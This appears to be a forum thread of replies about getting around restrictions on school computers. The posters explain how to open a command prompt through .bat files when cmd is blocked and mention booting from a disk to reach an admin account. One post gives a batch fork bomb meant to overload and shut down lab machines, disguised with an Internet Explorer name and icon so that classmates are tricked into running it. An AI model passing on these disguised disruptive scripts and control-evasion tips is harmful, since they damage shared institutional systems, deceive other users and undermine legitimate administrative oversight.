that just means you arent on the system admin profile. you must do it from the system admin. in most cases, your teacher's cpu.

Also, to start CMD you can go to Notepad, write 'start' (without the ' '), save as a .bat and run it, it will open a CMD window that runs the actual CMD

if anyone has a problem running the REMOTE shutdown, you could always do a normal shutdown and fake it as a virus on another computer while someone leaves. just get on their computer and make a notepad doc titled start.bat. in the doc type the following:
    start
    start
    start.bat
    start
    start
    start.bat

i reccommend to copy and paste it on there at least 50 times. change the name of the document after you save it to something like Internet explorer, then change the icon. if your cpu lab uses older computers you can make them have a lag overload and shutdown. trick your friends into clicking in thinking they'll get the internet.

This will probably work at 5% of schools (Random estimate) :)

My computer properties is blocked half the time, so is cmd prompt. You can always create a .bat file (open a .txt file) type in "command.com" rename the txt file to (title).bat and run it. But normally half the commands are blocked, your only real hope is by logging into an admin account which can only really be done by booting from some kind of unix based disk (and that's if booting from disk is allowed from BIOS.)

So yah, good luck with that :p

Go to a website and right click view source,
then select all and delete the text file.

    C&P this:

    @echo
    command.com
    net user

File, And save as (Name).bat, Then run it.
As far as seeing my computers name, I can't either
    because it blocked.
